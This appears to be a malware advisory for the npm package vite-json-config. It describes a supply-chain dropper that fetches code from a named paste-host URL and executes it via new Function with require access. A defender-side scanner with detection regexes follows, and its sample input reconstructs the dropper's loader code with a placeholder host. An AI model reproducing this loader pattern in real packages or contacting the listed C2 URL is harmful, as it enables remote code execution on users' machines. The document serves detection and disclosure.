
MAL-2026-4705

Malicious code in vite-json-config (npm)

Details


## Source: amazon-inspector (9a7c9683fed8b8696938eb7ad88e158f70a075851b0dd511af991ecd69a4d0fd)

The package presents itself as a vite/tsconfig path helper and clones the public API of tsconfig-paths (createMatchPath, matchFromAbsolutePaths, register, loadConfig). A new exported `configJson` entry point spawns a detached `node lib/mapProps.js` child process via `child_process.spawn(..., { detached: true, stdio: 'ignore' })` (lib/config-loader.js). lib/mapProps.js performs an HTTPS GET to https://www.jsonkeeper.com/b/5IZTJ — an anonymous, mutable JSON paste host — and passes the response's `Cookie` field directly to `new Function('require', s)(require)`, giving the publisher arbitrary code execution inside the consumer process with full `require` access. The fetch URL and header are concealed by shadowing `process` with a local object whose `env` uses cover-story names (DEV_API_KEY, DEV_SECRET_KEY, DEV_SECRET_VALUE) that actually hold the C2 URL and HTTP header. There is no integrity check on the fetched payload; the paste content can be changed at any time by whoever controls the jsonkeeper.com entry. Combined with the cloned legitimate-package API surface, this is a deliberate supply-chain dropper, not a coding mistake.
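As an added defender-side example (not code from the advisory, the amazon-inspector report, or the package), the following static triage scanner flags the dropper indicators described above in a package's source files: a detached child spawn with ignored stdio, fetched data fed into `new Function(...)(require)`, a locally shadowed `process` object, and a remote fetch whose URL comes from an env-style lookup. The sample package contents are constructed here with a placeholder URL; only the file names come from the advisory.

```javascript
// Added example: static indicator scan for the dropper pattern described
// in the advisory. Constructed sample input; not the package's real code.
const INDICATORS = [
  { id: 'detached-spawn',
    re: /spawn\s*\([\s\S]*?detached\s*:\s*true[\s\S]*?stdio\s*:\s*['"]ignore['"]/ },
  { id: 'dynamic-function-with-require',
    re: /new\s+Function\s*\(\s*['"]require['"][\s\S]*?\)\s*\(\s*require\s*\)/ },
  { id: 'process-shadowing',
    re: /\b(?:const|let|var)\s+process\s*=\s*\{/ },
  { id: 'remote-fetch-from-env-lookup',
    re: /https?\.(?:get|request)\s*\(\s*process\.env\.\w+/ },
];

// Scan one file's text; returns the ids of every matched indicator.
function scanSource(text) {
  return INDICATORS.filter(i => i.re.test(text)).map(i => i.id);
}

// Scan a package given as { relativePath: sourceText }. A single file hitting
// two or more indicators is treated as high-risk (loader + eval in one place).
function scanPackage(files) {
  const findings = {};
  for (const [path, text] of Object.entries(files)) {
    const hits = scanSource(text);
    if (hits.length) findings[path] = hits;
  }
  const highRisk = Object.values(findings).some(h => h.length >= 2);
  return { findings, highRisk };
}

// Constructed sample mimicking the layout the advisory describes. File names
// are from the advisory; contents are made up, and the URL is a placeholder.
const SAMPLE_PACKAGE = {
  'lib/config-loader.js':
    "const { spawn } = require('child_process');\n" +
    "exports.configJson = () => spawn(process.execPath, ['lib/mapProps.js'], { detached: true, stdio: 'ignore' }).unref();\n",
  'lib/mapProps.js':
    "const https = require('https');\n" +
    "const process = { env: { DEV_API_KEY: 'https://example.invalid/placeholder' } };\n" +
    "https.get(process.env.DEV_API_KEY, res => { let s = ''; res.on('data', d => s += d); res.on('end', () => new Function('require', s)(require)); });\n",
  'lib/match-path.js': "exports.createMatchPath = () => () => undefined;\n",
};

console.log(JSON.stringify(scanPackage(SAMPLE_PACKAGE), null, 2));
```

In practice, run `scanPackage` over the extracted tarball of a dependency before install (or in CI) and treat any high-risk result as a reason to block the version and review it by hand.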


Affected packages

npm / vite-json-config

No fixed version published yet for vite-json-config (npm). Pin to a known-safe version or switch to an alternative.

References